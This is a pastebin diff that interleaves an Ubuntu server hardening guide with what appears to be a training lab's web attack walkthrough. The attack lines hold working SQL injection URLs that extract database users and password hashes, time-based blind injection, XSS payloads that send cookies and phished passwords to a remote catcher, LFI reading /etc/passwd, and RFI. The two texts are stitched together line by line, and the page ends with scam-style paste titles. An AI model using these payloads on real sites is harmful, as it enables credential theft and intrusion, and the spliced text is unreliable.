1075	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
1076	-	net.ipv4.tcp_synack_retries = 2
1076	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
1077	-	net.ipv4.tcp_syn_retries = 5
1077	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
1078		http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
1079	-	# Log Martians
1079	+	http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
1080	-	net.ipv4.conf.all.log_martians = 1
1080	+	---------------------------------------------------------------------------------------------------------
1081	-	net.ipv4.icmp_ignore_bogus_error_responses = 1
1081	+
1082		We are using a union select statement because we are joining the developer's query with one of our own.
1083	-	# Ignore ICMP redirects
1083	+	Reference:
1084	-	net.ipv4.conf.all.accept_redirects = 0
1084	+	http://www.techonthenet.com/sql/union.php
1085	-	net.ipv6.conf.all.accept_redirects = 0
1085	+	The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
1086	-	net.ipv4.conf.default.accept_redirects = 0
1086	+	It removes duplicate rows between the various SELECT statements.
1087	-	net.ipv6.conf.default.accept_redirects = 0
1087	+
1088		Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
1089	-	# Ignore Directed pings
1089	+	---------------------------Paste these one line at a time into Firefox-----------------------------------
1090	-	net.ipv4.icmp_echo_ignore_all = 1
1090	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
1091	-	To reload sysctl with the latest changes, enter:
1091	+	---------------------------------------------------------------------------------------------------------
1092	-	sudo sysctl -p
1092	+	Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
1093	-	7. Disable Open DNS Recursion and Remove Version Info - BIND DNS Server.
1093	+
1094		---------------------------Paste these one line at a time into Firefox-----------------------------------
1095	-	Open a Terminal and enter the following :
1095	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
1096	-	sudo vi /etc/bind/named.conf.options
1096	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
1097	-	Add the following to the Options section :
1097	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
1098	-	recursion no;
1098	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
1099	-	version "Not Disclosed";
1099	+	---------------------------------------------------------------------------------------------------------
1100	-	Restart BIND DNS server. Open a Terminal and enter the following :
1100	+
1101	-	sudo service bind9 restart
1101	+
1102	-	8. Prevent IP Spoofing.
1102	+
1103
1104	-	Open a Terminal and enter the following :
1104	+	- Another way is to see if you can get the backend to perform an arithmetic function
1105	-	sudo vi /etc/host.conf
1105	+	---------------------------Paste these one line at a time into Firefox-----------------------------------
1106	-	Add or edit the following lines :
1106	+	http://45.77.162.239/bookdetail.aspx?id=(2)
1107	-	order bind,hosts
1107	+	http://45.77.162.239/bookdetail.aspx?id=(4-2)
1108	-	nospoof on
1108	+	http://45.77.162.239/bookdetail.aspx?id=(4-1)
1109	-	9. Harden PHP for security.
1109	+	---------------------------------------------------------------------------------------------------------
1110
1111	-	Edit the php.ini file :
1111	+	- This is some true/false logic testing
1112	-	sudo vi /etc/php5/apache2/php.ini
1112	+	---------------------------Paste this into Firefox-----------------------------------
1113	-	Add or edit the following lines an save :
1113	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
1114	-	disable_functions = exec,system,shell_exec,passthru
1114	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
1115	-	register_globals = Off
1115	+	http://45.77.162.239/bookdetail.aspx?id=1*1
1116	-	expose_php = Off
1116	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
1117	-	display_errors = Off
1117	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
1118	-	track_errors = Off
1118	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
1119	-	html_errors = Off
1119	+	http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
1120	-	magic_quotes_gpc = Off
1120	+	http://45.77.162.239/bookdetail.aspx?id=2 &0#
1121	-	mail.add_x_header = Off
1121	+	-------------------------------------------------------------------------------------
1122	-	session.name = NEWSESSID
1122	+
1123	-	Restart Apache server. Open a Terminal and enter the following :
1123	+	-- Now that we've seen the differences in the webpage with True/False SQL Injection - let's see what we can learn using it
1124	-	sudo service apache2 restart
1124	+	---------------------------Paste this into Firefox-----------------------------------
1125	-	10. Restrict Apache Information Leakage.
1125	+	http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
1126		http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
1127	-	Edit the Apache2 configuration security file :
1127	+	http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
1128	-	sudo vi /etc/apache2/conf-available/security.conf
1128	+	http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
1129	-	Add or edit the following lines and save :
1129	+	---------------------------------------------------------------------------------------
1130	-	ServerTokens Prod
1130	+
1131	-	ServerSignature Off
1131	+
1132	-	TraceEnable Off
1132	+
1133	-	Header unset ETag
1133	+	# Blind SQL Injection Testing #
1134	-	Header always unset X-Powered-By
1134	+
1135	-	FileETag None
1135	+	Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
1136	-	Restart Apache server. Open a Terminal and enter the following :
1136	+
1137	-	sudo service apache2 restart
1137	+	3 - Total Characters
1138	-	11. Web Application Firewall - ModSecurity.
1138	+	---------------------------Paste these one line at a time into Firefox-----------------------------------
1139		http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
1140	-	See : How to install apache2 mod_security and mod_evasive on Ubuntu 12.04 LTS server
1140	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
1141	-	12. Protect from DDOS (Denial of Service) attacks - ModEvasive
1141	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
1142		---------------------------------------------------------------------------------------------------------
1143	-	See : How to install apache2 mod_security and mod_evasive on Ubuntu 12.04 LTS server
1143	+
1144	-	13. Scan logs and ban suspicious hosts - DenyHosts and Fail2Ban.
1144	+	Let's go for a quick check to see if it's DBO
1145		---------------------------Paste this into Firefox-----------------------------------
1146	-	DenyHosts is a python program that automatically blocks SSH attacks by adding entries to /etc/hosts.deny. DenyHosts will also inform Linux administrators about offending hosts, attacked users and suspicious logins.
1146	+	http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
1147	-	Open a Terminal and enter the following :
1147	+	-------------------------------------------------------------------------------------
1148	-	sudo apt-get install denyhosts
1148	+	Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
1149	-	After installation edit the configuration file /etc/denyhosts.conf and change the email, and other settings as required.
1149	+
1150	-	To edit the admin email settings open a terminal window and enter:
1150	+	D - 1st Character
1151	-	sudo vi /etc/denyhosts.conf
1151	+	---------------------------Paste these one line at a time into Firefox-----------------------------------
1152	-	Change the following values as required on your server :
1152	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
1153	-	ADMIN_EMAIL = root@localhost
1153	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
1154	-	SMTP_HOST = localhost
1154	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
1155	-	SMTP_PORT = 25
1155	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
1156	-	#SMTP_USERNAME=foo
1156	+	---------------------------------------------------------------------------------------------------------
1157	-	#SMTP_PASSWORD=bar
1157	+
1158	-	SMTP_FROM = DenyHosts nobody@localhost
1158	+	B - 2nd Character
1159	-	#SYSLOG_REPORT=YES
1159	+	---------------------------Paste these one line at a time into Firefox-----------------------------------
1160	-	Fail2ban is more advanced than DenyHosts as it extends the log monitoring to other services including SSH, Apache, Courier, FTP, and more.
1160	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1161	-	Fail2ban scans log files and bans IPs that show the malicious signs -- too many password failures, seeking for exploits, etc.
1161	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1162	-	Generally Fail2Ban then used to update firewall rules to reject the IP addresses for a specified amount of time, although any arbitrary other action could also be configured.
1162	+	---------------------------------------------------------------------------------------------------------
1163	-	Out of the box Fail2Ban comes with filters for various services (apache, courier, ftp, ssh, etc).
1163	+
1164	-	Open a Terminal and enter the following :
1164	+	O - 3rd Character
1165	-	sudo apt-get install fail2ban
1165	+	---------------------------Paste these one line at a time into Firefox-----------------------------------
1166	-	After installation edit the configuration file /etc/fail2ban/jail.local and create the filter rules as required.
1166	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1167	-	To edit the settings open a terminal window and enter:
1167	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
1168	-	sudo vi /etc/fail2ban/jail.conf
1168	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1169	-	Activate all the services you would like fail2ban to monitor by changing enabled = false to enabled = true
1169	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1170	-	For example if you would like to enable the SSH monitoring and banning jail, find the line below and change enabled from false to true. Thats it.
1170	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
1171	-	[sshd]
1171	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
1172		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1173	-	enabled = true
1173	+	---------------------------------------------------------------------------------------------------------
1174	-	port = ssh
1174	+
1175	-	filter = sshd
1175	+
1176	-	logpath = /var/log/auth.log
1176	+	###############################################################################
1177	-	maxretry = 3
1177	+	# What is XSS #
1178	-	If you have selected a non-standard SSH port in step 3 then you need to change the port setting in fail2ban from ssh which by default is port 22, to your new port number, for example if you have chosen 1234 then port = 1234
1178	+	# https://s3.amazonaws.com/infosecaddicts-files/2-Intro_To_XSS.pptx #
1179	-	[sshd]
1179	+	###############################################################################
1180
1181	-	enabled = true
1181	+	OK - what is Cross Site Scripting (XSS)
1182	-	port = <ENTER YOUR SSH PORT NUMBER HERE>
1182	+
1183	-	filter = sshd
1183	+	1. Use Firefox to browse to the following location:
1184	-	logpath = /var/log/auth.log
1184	+	---------------------------Paste this into Firefox-----------------------------------
1185	-	maxretry = 3
1185	+	http://45.63.104.73/xss_practice/
1186	-	If you would like to receive emails from Fail2Ban if hosts are banned change the following line to your email address.
1186	+	-------------------------------------------------------------------------------------
1187	-	destemail = root@localhost
1187	+
1188	-	and change the following line from :
1188	+	A really simple search page that is vulnerable should come up.
1189	-	action = %(action_)s
1189	+
1190	-	to:
1190	+
1191	-	action = %(action_mwl)s
1191	+
1192	-	You can also create rule filters for the various services that you would like fail2ban to monitor that is not supplied by default.
1192	+
1193	-	sudo vi /etc/fail2ban/jail.local
1193	+	2. In the search box type:
1194	-	Good instructions on how to configure fail2ban and create the various filters can be found on HowtoForge - click here for an example
1194	+	---------------------------Paste this into Firefox-----------------------------------
1195	-	When done with the configuration of Fail2Ban restart the service with :
1195	+	<script>alert('So this is XSS')</script>
1196	-	sudo service fail2ban restart
1196	+	-------------------------------------------------------------------------------------
1197	-	You can also check the status with.
1197	+
1198	-	sudo fail2ban-client status
1198	+
1199	-	14. Intrusion Detection - PSAD.
1199	+	This should pop-up an alert window with your message in it proving XSS is in fact possible.
1200		Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1201	-	Cipherdyne PSAD is a collection of three lightweight system daemons that run on Linux machines and analyze iptables log messages to detect port scans and other suspicious traffic.
1201	+
1202	-	To install the latest version from the source files follow these instruction : How to install PSAD Intrusion Detection on Ubuntu 12.04 LTS server
1202	+
1203	-	OR install the older version from the Ubuntu software repositories, open a Terminal and enter the following :
1203	+	3. In the search box type:
1204	-	sudo apt-get install psad
1204	+	---------------------------Paste this into Firefox-----------------------------------
1205	-	Then for basic configuration see How to install PSAD Intrusion Detection on Ubuntu 12.04 LTS server and follow from step 2:
1205	+	<script>alert(document.cookie)</script>
1206	-	15. Check for rootkits - RKHunter and CHKRootKit.
1206	+	-------------------------------------------------------------------------------------
1207
1208	-	Both RKHunter and CHKRootkit basically do the same thing - check your system for rootkits. No harm in using both.
1208	+
1209	-	Open a Terminal and enter the following :
1209	+	This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
1210	-	sudo apt-get install rkhunter chkrootkit
1210	+	Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1211	-	To run chkrootkit open a terminal window and enter :
1211	+
1212	-	sudo chkrootkit
1212	+	4. Now replace that alert script with:
1213	-	To update and run RKHunter. Open a Terminal and enter the following :
1213	+	---------------------------Paste this into Firefox-----------------------------------
1214	-	sudo rkhunter --update
1214	+	<script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
1215	-	sudo rkhunter --propupd
1215	+	-------------------------------------------------------------------------------------
1216	-	sudo rkhunter --check
1216	+
1217	-	16. Scan open ports - Nmap.
1217	+	This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
1218
1219	-	Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.
1219	+
1220	-	Open a Terminal and enter the following :
1220	+	5. Now view the stolen cookie at:
1221	-	sudo apt-get install nmap
1221	+	---------------------------Paste this into Firefox-----------------------------------
1222	-	Scan your system for open ports with :
1222	+	http://45.63.104.73/xss_practice/cookie_stealer_logs.html
1223	-	nmap -v -sT localhost
1223	+	-------------------------------------------------------------------------------------
1224	-	SYN scanning with the following :
1224	+
1225	-	sudo nmap -v -sS localhost
1225	+	The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
1226	-	17. Analyse system LOG files - LogWatch.
1226	+
1227
1228	-	Logwatch is a customizable log analysis system. Logwatch parses through your system's logs and creates a report analyzing areas that you specify. Logwatch is easy to use and will work right out of the package on most systems.
1228	+
1229	-	Open a Terminal and enter the following :
1229	+
1230	-	sudo apt-get install logwatch libdate-manip-perl
1230	+
1231	-	To view logwatch output use less :
1231	+
1232	-	sudo logwatch \| less
1232	+
1233	-	To email a logwatch report for the past 7 days to an email address, enter the following and replace mail@domain.com with the required email. :
1233	+	# A Better Way To Demo XSS #
1234	-	sudo logwatch --mailto mail@domain.com --output mail --format html --range 'between -7 days and today'
1234	+
1235	-	18. Apparmor - Application Armor.
1235	+
1236
1237	-	More information can be found here. Ubuntu Server Guide - Apparmor
1237	+	Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
1238	-	It is installed by default since Ubuntu 7.04.
1238	+
1239	-	Open a Terminal and enter the following :
1239	+
1240	-	sudo apt-get install apparmor apparmor-profiles
1240	+	Use Firefox to browse to the following location:
1241	-	Check to see if things are running :
1241	+	---------------------------Paste this into Firefox-----------------------------------
1242	-	sudo apparmor_status
1242	+	http://45.63.104.73/xss_practice/
1243	-	19. Audit your system security - Tiger and Tripwire.
1243	+	-------------------------------------------------------------------------------------
1244
1245	-	Tiger is a security tool that can be use both as a security audit and intrusion detection system.
1245	+
1246	-	Tripwire is a host-based intrusion detection system (HIDS) that checks file and folder integrity.
1246	+	Paste this in the search box
1247	-	Open a Terminal and enter the following :
1247	+	----------------------------
1248	-	sudo apt-get install tiger tripwire
1248	+
1249	-	To setup Tripwire good installation guides can be found on Digital Ocean here and on Unixmen here
1249	+
1250	-	To run tiger enter :
1250	+	Option 1
1251	-	sudo tiger
1251	+	--------
1252	-	All Tiger output can be found in the /var/log/tiger
1252	+	---------------------------Paste this into Firefox-----------------------------------
1253	-	To view the tiger security reports, open a Terminal and enter the following :
1253	+	<script>
1254	-	sudo less /var/log/tiger/security.report.*
1254	+	password=prompt('Your session is expired. Please enter your password to continue',' ');
1255		document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
1256		</script>
1257		-------------------------------------------------------------------------------------
1258
1259	-	- The following command line executables are found in the Mac as well as most Linux Distributions.
1259	+	Now view the stolen cookie at:
1260		---------------------------Paste this into Firefox-----------------------------------
1261		http://45.63.104.73/xss_practice/passwords.html
1262		-------------------------------------------------------------------------------------
1263
1264
1265		Option 2
1266		--------
1267		-------------------------Paste this into Firefox-----------------------------------
1268		<script>
1269		username=prompt('Please enter your username',' ');
1270	-	###############
1270	+	password=prompt('Please enter your password',' ');
1271	-	# Apache Logs #
1271	+	document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
1272	-	###############
1272	+	</script>
1273		-------------------------------------------------------------------------------------
1274
1275	-	http://www.the-art-of-web.com/system/logs/
1275	+
1276
1277	-	wget https://s3.amazonaws.com/SecureNinja/Python/access_log
1277	+	Now view the stolen cookie at:
1278		http://45.63.104.73/xss_practice/username_password_logs.html
1279
1280	-	- You want to list all user agents ordered by the number of times they appear (descending order):
1280	+
1281
1282	-	awk -F\" '{print $6}' access_log \| sort \| uniq -c \| sort -fr
1282	+
1283		#########################################
1284		# Let's try a local file include (LFI) #
1285		#########################################
1286	-	- Using the default separator which is any white-space (spaces or tabs) we get the following:
1286	+	- Here is an example of an LFI
1287		- Open this page in Firefox:
1288	-	awk '{print $1}' access_log # ip address (%h)
1288	+	-------------------------Paste this into Firefox-----------------------------------
1289	-	awk '{print $2}' access_log # RFC 1413 identity (%l)
1289	+	http://45.63.104.73/showfile.php?filename=contactus.txt
1290	-	awk '{print $3}' access_log # userid (%u)
1290	+	-------------------------------------------------------------------------------------
1291	-	awk '{print $4,5}' access_log # date/time (%t)
1291	+
1292	-	awk '{print $9}' access_log # status code (%>s)
1292	+
1293	-	awk '{print $10}' access_log # size (%b)
1293	+	- Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
1294		- Here you see a direct reference to a file on the local filesystem of the victim machine.
1295	-	- You might notice that we've missed out some items. To get to them we need to set the delimiter to the " character which changes the way the lines are 'exploded' and allows the following:
1295	+	- You can attack this by doing the following:
1296		-------------------------Paste this into Firefox-----------------------------------
1297	-	awk -F\" '{print $2}' access_log # request line (%r)
1297	+	http://45.63.104.73/showfile.php?filename=/etc/passwd
1298	-	awk -F\" '{print $4}' access_log # referer
1298	+	-------------------------------------------------------------------------------------
1299	-	awk -F\" '{print $6}' access_log # user agent
1299	+
1300
1301		- This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
1302	-	awk -F\" '{print $6}' access_log \
1302	+	- somewhere else on the Internet. Here is an example of a text file on the web:
1303	-	\| sed 's/(\([^;]\+; [^;]\+\)[^)]*)/(\1)/' \
1303	+	-------------------------Paste this into Firefox-----------------------------------
1304	-	\| sort \| uniq -c \| sort -fr
1304	+	http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
1305		-------------------------------------------------------------------------------------
1306
1307	-	- The next step is to start filtering the output so you can narrow down on a certain page or referer. Would you like to know which pages Google has been requesting from your site?
1307	+	- Now we can attack the target via RFI like this:
1308		-------------------------Paste this into Firefox-----------------------------------
1309	-	awk -F\" '($6 ~ /Googlebot/){print $2}' access_log \| awk '{print $2}'
1309	+	http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
1310	-	Or who's been looking at your guestbook?
1310	+	-------------------------------------------------------------------------------------
1311
1312	-	awk -F\" '($2 ~ /guestbook\.html/){print $6}' access_log
1312	+
1313
1314		###############################
1315		# How much fuzzing is enough? #
1316	-	https://blog.nexcess.net/2011/01/21/one-liners-for-apache-log-files/
1316	+
1317		There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
1318	-	# top 20 URLs from the last 5000 hits
1318	+
1319	-	tail -5000 ./access_log \| awk '{print $7}' \| sort \| uniq -c \| sort -rn \| head -20
1319	+	Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
1320	-	tail -5000 ./access_log \| awk '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
1320	+
1321
1322	-	# top 20 URLS excluding POST data from the last 5000 hits
1322	+	Step 1: Ask yourself the 3 questions per page of the site.
1323	-	tail -5000 ./access_log \| awk -F"[ ?]" '{print $7}' \| sort \| uniq -c \| sort -rn \| head -20
1323	+
1324	-	tail -5000 ./access_log \| awk -F"[ ?]" '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
1324	+	Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
1325
1326	-	# top 20 IPs from the last 5000 hits
1326	+	Step 3: When you load your fuzz strings - use the following decision tree
1327	-	tail -5000 ./access_log \| awk '{print $1}' \| sort \| uniq -c \| sort -rn \| head -20
1327	+
1328	-	tail -5000 ./access_log \| awk '{freq[$1]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
1328	+	- Are the fuzz strings causing a default error message (example 404)?
1329		- If this is the case then it is most likely NOT vulnerable
1330	-	# top 20 URLs requested from a certain ip from the last 5000 hits
1330	+
1331	-	IP=1.2.3.4; tail -5000 ./access_log \| grep $IP \| awk '{print $7}' \| sort \| uniq -c \| sort -rn \| head -20
1331	+	- Are the fuzz strings causing a WAF or LB custom error message?
1332	-	IP=1.2.3.4; tail -5000 ./access_log \| awk -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
1332	+	- If this is the case then you need to find an encoding method to bypass
1333
1334	-	# top 20 URLS requested from a certain ip excluding, excluding POST data, from the last 5000 hits
1334	+
1335	-	IP=1.2.3.4; tail -5000 ./access_log \| fgrep $IP \| awk -F "[ ?]" '{print $7}' \| sort \| uniq -c \| sort -rn \| head -20
1335	+	- Are the fuzz strings causing an error message that discloses the backend type?
1336	-	IP=1.2.3.4; tail -5000 ./access_log \| awk -F"[ ?]" -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
1336	+	- If yes, then identify DB type and find correct syntax to successfully exploit
1337		- Some example strings that I use are:
1338	-	# top 20 referrers from the last 5000 hits
1338	+	'
1339	-	tail -5000 ./access_log \| awk '{print $11}' \| tr -d '"' \| sort \| uniq -c \| sort -rn \| head -20
1339	+	"
1340	-	tail -5000 ./access_log \| awk '{freq[$11]++} END {for (x in freq) {print freq[x], x}}' \| tr -d '"' \| sort -rn \| head -20
1340	+	() <----- Take the parameter value and put it in parenthesis
1341		(5-1) <----- See if you can perform an arithmetic function
1342	-	# top 20 user agents from the last 5000 hits
1342	+
1343	-	tail -5000 ./access_log \| cut -d\ -f12- \| sort \| uniq -c \| sort -rn \| head -20
1343	+
1344		- Are the fuzz strings rendering executable code?
1345	-	# sum of data (in MB) transferred in the last 5000 hits
1345	+	- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
1346	-	tail -5000 ./access_log \| awk '{sum+=$10} END {print sum/1048576}'
1346	+	- Some example strings that I use are:
1347		<b>hello</b>
1348		<u>hello</u>
1349		<script>alert(123);</script>
1350		<script>alert(xss);</script>
1351		<script>alert('xss');</script>
1352		<script>alert("xss");</script>

Public Pastes

⭐ get any gift card for AF
JavaScript | 6 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY KE
JavaScript | 7 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 14 min ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 15 min ago | 0.17 KB
⭐ FREE giftcards method ON
JavaScript | 23 min ago | 0.17 KB
⭐ Binance Account hack 3B
JavaScript | 24 min ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 31 min ago | 0.17 KB
⭐ get any gift card for FREE⭐ 2I
JavaScript | 32 min ago | 0.17 KB